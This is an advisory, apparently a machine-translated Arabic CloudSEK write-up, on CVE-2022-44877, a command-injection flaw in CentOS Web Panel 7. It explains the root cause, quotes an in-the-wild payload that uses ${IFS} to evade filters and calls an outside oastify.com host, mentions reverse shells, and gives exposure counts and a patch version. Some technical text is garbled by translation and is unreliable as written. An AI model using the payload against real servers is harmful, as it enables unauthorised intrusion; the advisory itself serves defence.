POC لثغرة RCE عالية التأثير في لوحة ويب Centos 7 (CVE-2022-44877) تزيد من مخاطر الهجمات

أجرى فريق أبحاث التهديدات في CloudSek تحقيقًا لفهم التفاصيل الفنية لـ CVE-2022-44877، واستغلال عمليات تثبيت CentOS Web Panel 7 على مستوى الإنترنت.

Updated on

August 19, 2025

Published on

January 12, 2023

Read MINUTES

Subscribe to the latest industry news, threats and resources.

Table of Contents

This is also a heading
This is a heading

الفئة: ذكاء نقاط الضعففئة نقاط الضعف الأمنية: تنفيذ التعليمات البرمجية عن بُعدغطاء الكهف: CVE-2022-44877السيرة الذاتية: 3.0 النتيجة: NA (لم يتم تعيينه)

ملخص تنفيذي

تهديدتأثيرتخفيف

تم العثور على ثغرة أمنية جديدة في تنفيذ الأوامر عن بُعد في بوابة إدارة الويب الخاصة بلوحة ويب Centos (Control) 7.
يمكن لممثل التهديد استغلال الثغرة الأمنية بسهولة من خلال طلب HTTP مُصمم.

يمكن الاستفادة من الثغرة الأمنية للحصول على غلاف عكسي والحفاظ على الثبات
يمكن لممثل التهديد عن بُعد غير المصادق تنفيذ هجمات برامج الفدية أو استخراج البيانات.

قم بالتحديث إلى أحدث إصدار لأن هذا يؤثر على لوحة ويب سينتوس 7 < v0.9.8.1147
أحدث إصدار - v0.9.8.1148

التحقيق والتحليل

كلاود سيكأجرى فريق أبحاث التهديدات التابع لـ CentOS تحقيقًا لفهم التفاصيل الفنية لـ CVE-2022-44877، واستغلال عمليات تثبيت CentOS Web Panel 7 على مستوى الإنترنت. من خلال مسار بحثنا، اكتشفنا أنه بعد الاستغلال، يمكن للمهاجم تنفيذ الأوامر عن بُعد بنفس مستوى الامتياز الذي تم تثبيت لوحة ويب CentOS عليه. في حالات متعددة، تم تحديد أن الامتياز الافتراضي لاستضافة التثبيت هو «الجذر» وهو ما يعادل «المسؤول» امتياز على ويندوز.

التحليل الفني - رمز إثبات المفهوم

أصدر باحث أمني POC بتاريخ جيثب وفيديو POC على يوتيوب في الخامس من يناير 2023 بعد الحصول على تأكيد من فريق Centos بأنه تم تصحيح عدد كافٍ من الخوادم. عند تحليل رمز الاستغلال المشترك، تم تحديد أن الخلل يكمن في الوظيفة التي سجلت إدخالات غير صحيحة على اللوحة. فيما يلي نموذج لمقتطف الشفرة المسؤول عن كتابة المحتوى باسم الملف»wrong_entry.log» صدى «إدخال غير صحيح، عنوان IP، HTTP_request_URI» >>. /wrong_entry.log علامات الاقتباس المزدوجة في الأمر أعلاه مسؤولة عن هذا التكوين الخاطئ، حيث أن هذه ميزة bash تساعد في تنفيذ الأمر. نظرًا لأن Http_request_uri يتم التحكم فيه من قبل المهاجم، يمكن لممثل التهديد إدراج أمر يتم تنفيذه على الخادم. عندما يتم تنفيذ الأمر أعلاه، نحصل على اتصال مرة أخرى بقذيفة المستمع. [معرف التسمية التوضيحية = «المرفق _22206" align= «alignnone» width="1115"] Illustration of 2 shells

رسم توضيحي لقذيفتين [/caption] هناك العديد من الخوادم الضعيفة في البرية وبدأت الجهات الفاعلة في مجال التهديد في استغلالها باستخدام حمولة الاستغلال المذكورة أدناه. [معرف التسمية التوضيحية = «المرفق _22207" align= «alignnone» width="1218"] The sample payload

حمولة العينة [/caption] فهم الحمولة

ping$ {IFS} - nc$ {IFS} 2 دولار {IFS} 222 غرام md8w98u9qwf7x5z7kw73quwkd82.oastify.com يمكن أن يكون تم تبسيطها إلى بينغ -نك 2 222 غرام مد8 واط 98u9qwf7x5z7kw73quwkd82.oastify.com
$ {IFS} هو متغير bash لإعطاء حرف مسافة واحد. يتم استخدام هذا لتجاوز التحقق من الأحرف السيئة في المساحة الفارغة.
وبالتالي، نحاول الحصول على رد فعل من الخادم الضعيف.

[معرف التسمية التوضيحية = «المرفق _22208" align= «alignnone» العرض = «887"] We get the following DNS interaction from the vulnerable server

نحصل على تفاعل DNS التالي من الخادم الضعيف [/caption]

معلومات من OSINT - قابلية الاستغلال والحضور

تعد Centos Web Panel 7 أداة إدارة خادم مستخدمة على نطاق واسع. ينتج عن استعلام Shodan عن ذلك حوالي 436,000 خادم قد يكون عرضة لثغرة تنفيذ التعليمات البرمجية عن بُعد. [معرف التسمية التوضيحية = «المرفق _22209" align= «alignnone» width="1681"] Shodan search query showing vulnerable servers

Shodan search query showing vulnerable servers

عرض استعلام بحث يعرض الخوادم الضعيفة [/caption] يمكن أيضًا ملاحظة نفس النمط من محركات البحث الأخرى مثل التعدادات. [معرف التسمية التوضيحية = «المرفق _22210" align= «alignnone» width="1582"] Censys search query showing vulnerable servers

Censys search query showing vulnerable servers

يُظهر استعلام بحث Censys الخوادم الضعيفة [/caption]

التخفيف

تعتبر الثغرة الأمنية عالية التأثير التي يمكن استغلالها بسهولة أيضًا هدفًا رئيسيًا للجهات الفاعلة في مجال التهديد. وبالنظر إلى أن POC أصبحت علنية الآن، فإنها تجعل مهمة الجهات الفاعلة في مجال التهديد أسهل بكثير. ومن ثم نوصي المستخدمين بالتحديث إلى أحدث إصدار، v0.9.8.1148.

المراجع

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

Table of Contents

This is also a heading
This is a heading

Recent Articles

مطالبة Cowin بتسريب البيانات وتحليل CloudSek

June 12, 2023

تدعي شركة Anonymous Sudan الإزالة الناجحة لأول موقع وتطبيق لبنك أبو ظبي عبر هجمات DDoS

May 29, 2023

Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.

جدولة عرض تجريبي

Real time Threat Intelligence Data

More information and context about Underground Chatter

On-Demand Research Services

Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.

Trusted by 400+ Top organisations

Get started

Learn more